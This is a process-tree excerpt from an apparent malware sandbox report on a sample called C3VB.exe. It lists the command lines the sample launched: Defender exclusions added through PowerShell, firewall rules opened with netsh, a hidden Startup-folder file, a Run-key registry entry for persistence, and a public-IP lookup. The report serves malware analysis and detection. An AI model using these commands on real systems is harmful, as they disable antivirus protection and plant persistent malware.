| ZeroBOX

C3VB.exe "C:\Users\test22\AppData\Local\Temp\C3VB.exe"
1928
- cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\HSTART.bat" "
  2144
  - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\vbs.vbs"
    2252
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\C3.bat" "
      2364
      - cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
        2428
        
        nslookup.exe nslookup myip.opendns.com. resolver1.opendns.com
        2472
      - cmd.exe C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
        2520
        
        WMIC.exe wmic ComputerSystem get Domain
        2568
      - powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\C3.exe"'
        2672
      - powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ratt.exe"'
        2796
      - powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe"'
        2884
      - 7z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y C3.7z
        2964
      - C3.exe "C3.exe"
        2396
        
        InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        2852
        
        4XR.exe "C:\Users\test22\AppData\Local\Temp\4XR.exe"
        2572
        
        cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\12.bat" "
        744
        
        wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\vbs.vbs"
        2936
        
        cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\C3.bat" "
        2948
        
        powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\4.zip"'
        1176
        
        powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4.zip"'
        2860
        
        7z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y 4.zip
        2148
        
        powershell.exe powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
        2668
        
        netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
        1712
        
        netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
        1476
        
        cmd.exe "C:\Windows\system32\cmd.exe"
        2532
        
        WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False
        200
        
        cmd.exe "C:\Windows\system32\cmd.exe"
        932
        
        WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        1668
        
        C3.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
        3060
        
        attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
        2552
        
        reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "4" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4.exe" /F
        204
        
        4.exe "4.exe"
        2468
      - powershell.exe powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
        2444
        
        netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
        2524
        
        netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
        2824
        
        cmd.exe "C:\Windows\system32\cmd.exe"
        2912
        
        WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False
        2992
        
        cmd.exe "C:\Windows\system32\cmd.exe"
        412
        
        WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        840
        
        attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
        2728
      - reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "C3" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe" /F
        2684

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents